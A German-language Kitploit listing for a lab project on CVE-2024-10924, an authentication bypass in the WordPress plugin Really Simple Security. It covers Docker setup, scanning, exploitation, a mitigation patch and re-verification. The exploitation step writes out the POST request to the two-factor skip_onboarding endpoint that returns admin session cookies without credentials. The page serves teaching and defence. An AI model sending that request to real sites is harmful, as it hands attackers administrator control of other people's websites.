Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10924 — Demonstriert Ausnutzung und Eindämmung von CVE-2024-10924, einer Authentifizierungsumgehung in WordPress Really Simple Security, mit automatisiertem Python-Exploit, manuellen Burp-Suite-Schritten und Patch-Verifizierung. | Kitploit
Tools/GitHubGitHub/bodoinon/cve-2024-10924
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

Demonstriert Ausnutzung und Eindämmung von CVE-2024-10924, einer Authentifizierungsumgehung in WordPress Really Simple Security, mit automatisiertem Python-Exploit, manuellen Burp-Suite-Schritten und Patch-Verifizierung.

Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-10924 - Authentifizierungsumgehung in Really Simple Security

ÜBERSICHT

Dieses Projekt demonstriert die Ausnutzung und Eindämmung von CVE-2024-10924, einer kritischen Authentifizierungsumgehungsschwachstelle im WordPress-Plugin „Really Simple Security“.

SCHRITT 1: UMGEBUNGSEINRICHTUNG

Starten Sie die anfällige WordPress-Umgebung: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

Überprüfen Sie, ob die Container laufen: docker ps

Zugriff auf WordPress: http://localhost:1337

Erforderliche Werkzeuge:

  • Python 3.x (für automatisiertes Exploit)
  • Burp Suite (für manuelle Ausnutzung)
  • GVM (Greenbone Vulnerability Management) für Scans

SCHRITT 2: SCHWACHSTELLENSCAN

Führen Sie einen GVM-Scan gegen das Ziel durch:

  • Ziel: http://localhost:1337
  • Erwartetes Ergebnis: CVE-2024-10924 erkannt
  • Schweregrad: Kritisch (CVSS 9.8)
  • Anfälliger Endpunkt: /reallysimplessl/v1/two_fa/skip_onboarding

SCHRITT 3: AUSNUTZUNG

Methode A - Automatisiertes Python-Exploit: python exploit.py

Methode B - Manuelle Burp Suite:

  1. Fangen Sie den Datenverkehr zu http://localhost:1337 ab

  2. Senden Sie eine POST-Anfrage: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. Beobachten Sie die Antwort mit dem Set-Cookie-Header, der eine Admin-Sitzung enthält

Erwartetes Ergebnis:

  • Status: 200 OK
  • Admin-Sitzungscookies zurückgegeben
  • Erfolgreiche Umgehung ohne Anmeldedaten

SCHRITT 4: EINDÄMMUNG

Wenden Sie den Patch an, um den anfälligen Endpunkt zu blockieren: .\patch.ps1

Was dies bewirkt:

  • Kopiert mitigation.php in das /wp-content/mu-plugins/-Verzeichnis des Containers
  • Blockiert alle Anfragen an den anfälligen REST-API-Endpunkt
  • Gibt 403 Forbidden für Exploit-Versuche zurück

SCHRITT 5: ÜBERPRÜFUNG

Führen Sie das Exploit erneut aus (Methode A oder B): python exploit.py

Erwartetes Ergebnis nach Eindämmung:

  • Status: 403 Forbidden
  • Keine Admin-Sitzungscookies zurückgegeben
  • Angriff erfolgreich blockiert

ZUSÄTZLICHE HINWEISE

Zum Stoppen der Umgebung: docker-compose down

Zum Anzeigen der Container-Logs: docker-compose logs -f

Zum legitimen Zugriff auf das WordPress-Admin: http://localhost:1337/wp-admin (Überprüfen Sie die docker-compose.yml auf Anmeldedaten)

Tool herunterladen